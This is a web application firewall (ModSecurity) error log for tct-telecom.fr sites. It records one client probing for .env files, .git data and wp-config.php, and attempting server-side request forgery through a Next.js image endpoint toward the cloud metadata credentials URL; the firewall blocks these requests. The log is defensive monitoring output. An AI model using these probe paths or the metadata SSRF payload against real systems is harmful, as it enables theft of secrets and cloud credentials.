[Mon May 11 15:23:16.314443 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.133:3242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRKy-5-wpj6Sx56aY3AAAAAI"]
[Mon May 11 15:23:16.314617 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY3QAAAA0"]
[Mon May 11 15:23:16.317322 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:3446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYROSQ-m-m0ukSShuCIwAAAUI"]
[Mon May 11 15:23:16.317521 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:3446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYROSQ-m-m0ukSShuCIwAAAUI"]
[Mon May 11 15:23:16.318534 2026] [proxy_fcgi:error] [pid 1320674:tid 1320692] [client 195.178.110.133:3232] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.321545 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSAAAARA"]
[Mon May 11 15:23:16.321661 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSAAAARA"]
[Mon May 11 15:23:16.321801 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSQAAAQ4"]
[Mon May 11 15:23:16.321841 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSAAAARA"]
[Mon May 11 15:23:16.321923 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSQAAAQ4"]
[Mon May 11 15:23:16.322114 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSQAAAQ4"]
[Mon May 11 15:23:16.323006 2026] [security2:error] [pid 1319953:tid 1319969] [client 195.178.110.133:3308] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROSQ-m-m0ukSShuCJQAAAU4"]
[Mon May 11 15:23:16.323124 2026] [security2:error] [pid 1319953:tid 1319969] [client 195.178.110.133:3308] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROSQ-m-m0ukSShuCJQAAAU4"]
[Mon May 11 15:23:16.323316 2026] [security2:error] [pid 1319953:tid 1319969] [client 195.178.110.133:3308] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROSQ-m-m0ukSShuCJQAAAU4"]
[Mon May 11 15:23:16.324183 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRKt2WtvoFr7xvGzUjgAAAIs"]
[Mon May 11 15:23:16.324305 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRKt2WtvoFr7xvGzUjgAAAIs"]
[Mon May 11 15:23:16.324488 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRKt2WtvoFr7xvGzUjgAAAIs"]
[Mon May 11 15:23:16.331569 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:3390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSgAAAQg"]
[Mon May 11 15:23:16.331763 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:3390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSgAAAQg"]
[Mon May 11 15:23:16.331987 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:3390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZSgAAAQg"]
[Mon May 11 15:23:16.333488 2026] [security2:error] [pid 1320398:tid 1320404] [client 195.178.110.133:3474] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYROJEyNRN152ArOSM-QAAAEQ"]
[Mon May 11 15:23:16.333618 2026] [security2:error] [pid 1320398:tid 1320404] [client 195.178.110.133:3474] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYROJEyNRN152ArOSM-QAAAEQ"]
[Mon May 11 15:23:16.344930 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRFchVQ3tCn0m9OpZTAAAARA"]
[Mon May 11 15:23:16.345615 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRFchVQ3tCn0m9OpZTAAAARA"]
[Mon May 11 15:23:16.345807 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRFchVQ3tCn0m9OpZTAAAARA"]
[Mon May 11 15:23:16.348646 2026] [security2:error] [pid 1319998:tid 1320018] [client 195.178.110.133:3362] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYRKt2WtvoFr7xvGzUjAAAAJI"]
[Mon May 11 15:23:16.350205 2026] [security2:error] [pid 1320674:tid 1320713] [client 195.178.110.133:3288] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRKO9RdIr1DwxYR2S6QAAANg"]
[Mon May 11 15:23:16.353846 2026] [proxy_fcgi:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.385602 2026] [proxy_fcgi:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.390918 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYROJEyNRN152ArOSNDQAAAEk"]
[Mon May 11 15:23:16.391636 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYROJEyNRN152ArOSNDQAAAEk"]
[Mon May 11 15:23:16.391827 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYROJEyNRN152ArOSNDQAAAEk"]
[Mon May 11 15:23:16.410185 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYROJEyNRN152ArOSNEAAAAEk"]
[Mon May 11 15:23:16.410870 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYROJEyNRN152ArOSNEAAAAEk"]
[Mon May 11 15:23:16.411105 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYROJEyNRN152ArOSNEAAAAEk"]
[Mon May 11 15:23:16.411774 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY5gAAAAs"]
[Mon May 11 15:23:16.411911 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY5gAAAAs"]
[Mon May 11 15:23:16.412095 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY5gAAAAs"]
[Mon May 11 15:23:16.419416 2026] [proxy_fcgi:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.437443 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRKy-5-wpj6Sx56aY5wAAAAs"]
[Mon May 11 15:23:16.437567 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRKy-5-wpj6Sx56aY5wAAAAs"]
[Mon May 11 15:23:16.437765 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRKy-5-wpj6Sx56aY5wAAAAs"]
[Mon May 11 15:23:16.438310 2026] [proxy_fcgi:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] AH01071: Got error 'Primary script unknown'
